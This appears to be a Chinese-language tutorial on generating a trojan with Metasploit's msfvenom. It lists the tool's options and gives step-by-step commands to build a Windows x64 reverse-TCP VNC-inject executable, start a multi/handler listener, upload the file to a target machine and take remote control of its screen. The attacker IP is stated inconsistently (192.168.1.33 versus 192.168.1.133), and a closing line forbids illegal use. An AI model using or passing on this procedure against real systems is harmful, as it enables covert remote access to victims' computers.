一、生成方式:利用msf模块中的msfvenom模块
二、原理:msfvenom是msfpayload、msfencode的结合体,利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线
三、msfvenom命令行选项如下
-p, --payload <payload> 指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用'-'或者stdin指定
-l, --list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all
-n, --nopsled <length> 为payload预先指定一个NOP滑动长度
-f, --format <format> 指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表)
-e, --encoder [encoder] 指定需要使用的encoder(编码器)
-a, --arch <architecture> 指定payload的目标架构
--platform <platform> 指定payload的目标平台
-s, --space <length> 设定有效攻击荷载的最大长度
-b, --bad-chars <list> 设定规避字符集,比如: '\x00\xff'
-i, --iterations <count> 指定payload的编码次数
-c, --add-code <path> 指定一个附加的win32 shellcode文件
-x, --template <path> 指定一个自定义的可执行文件作为模板
-k, --keep 保护模板程序的动作,注入的payload作为一个新的进程运行
--payload-options 列举payload的标准选项
-o, --out <path> 保存payload
-v, --var-name <name> 指定一个自定义的变量,以确定输出格式
--shellest 最小化生成payload
-h, --help 查看帮助选项
--help-formats 查看msf支持的输出格式列表
四、使用方法
1、msfvenom --list platforms 显示支持的平台
2、msfvenom --list formats 显示支持的格式
3、msfvenom --list archs 显示支持的架构
4、msfvenom --list encoders 显示支持的编码器
5、生成木马
目标主机:192.168.1.129(win7 x64)
攻击机:192.168.1.33
攻击端口:12121
生成木马:msfvenom --arch x64 --platform windows -p windows/x64/vncinject/reverse_tcp lhost=192.168.1.133 lport=12121 -f exe -o /root/win64.exe
6、进入监听模块 use exploit/multi/handler
7、设置payload反弹 set payload windows/x64/vncinject/reverse_tcp
8、查看需要设置的参数:show options
9、设置攻击机ip:set lhost 192.168.1.133
10、设置攻击端口:set lport 12121
11、将生成的exe文件上传到目标主机并运行
12、run攻击
13、攻击机的监控画面
14、目标主机画面
禁止非法,后果自负
